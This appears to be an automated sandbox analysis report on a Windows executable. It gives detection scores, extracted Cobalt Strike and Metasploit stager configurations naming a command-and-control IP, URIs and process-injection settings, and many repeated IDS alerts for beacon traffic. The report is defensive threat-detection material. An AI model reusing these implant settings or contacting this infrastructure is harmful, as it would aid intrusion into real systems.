Windows Analysis Report
vNenBbeRFZ.exe

AV Detection

Source: vNenBbeRFZ.exe

Avira: detected

Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 9999, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "47.239.242.141,/ga.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 391144938, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)\r\n", "Type": "Metasploit Download", "URL": "http://47.239.242.141/BQPy"}

Source: 47.239.242.141	Virustotal: Detection: 16%			Perma Link
Source: http://47.239.242.141:9999/ga.js	Virustotal: Detection: 18%			Perma Link
Source: http://47.239.242.141:9999/BQPy	Virustotal: Detection: 10%			Perma Link

Source: vNenBbeRFZ.exe	ReversingLabs: Detection: 92%
Source: vNenBbeRFZ.exe	Virustotal: Detection: 84%			Perma Link

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: vNenBbeRFZ.exe

Joe Sandbox ML: detected

Cryptography

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7C187 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

0_2_03D7C187

Compliance

Source: vNenBbeRFZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Spreading

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D791F0 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,		0_2_03D791F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D747C9 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03D747C9

Networking

Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49744 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57245 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57260 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57241 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57247 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57255 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57256 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54005 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54007 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57244 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57246 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57262 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57259 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49746 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57264 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54001 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57243 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54035 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57251 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57252 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49742 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54011 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54012 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57250 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54058 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57254 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54087 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57265 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54003 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54002 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54093 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57263 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54046 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57248 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54008 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54110 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57258 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54052 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54099 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54004 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54075 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57253 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57261 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54076 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54123 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54141 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54147 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54116 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54000 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54132 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54151 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54022 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54167 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57257 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54029 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57249 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57242 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54006 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54203 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54180 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54009 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54209 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54197 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54220 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54190 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54226 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54067 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54157 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54235 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54174 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54249 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54255 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54137 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54241 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54264 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54271 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54287 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54295 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54310 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54318 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54319 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54301 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54322 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54323 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54320 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54325 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54328 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54326 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54330 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54278 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54333 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54337 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54338 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54335 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54344 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54349 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54345 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54347 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54346 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54321 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54342 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54331 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54357 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54332 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54355 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54348 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54354 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54343 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54339 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54361 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54369 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54362 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54324 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54371 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54350 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54374 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54377 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54334 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54372 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54376 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54370 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54373 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54327 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54353 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54389 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54379 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54356 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54400 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54375 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54380 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54399 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54406 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54359 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54358 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54396 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54383 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54403 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54382 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54340 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54397 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54385 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54418 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54420 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54401 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54367 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54363 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54422 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54430 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54431 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54395 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54417 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54398 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54364 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54378 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54429 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54414 -> 47.239.242.141:9999
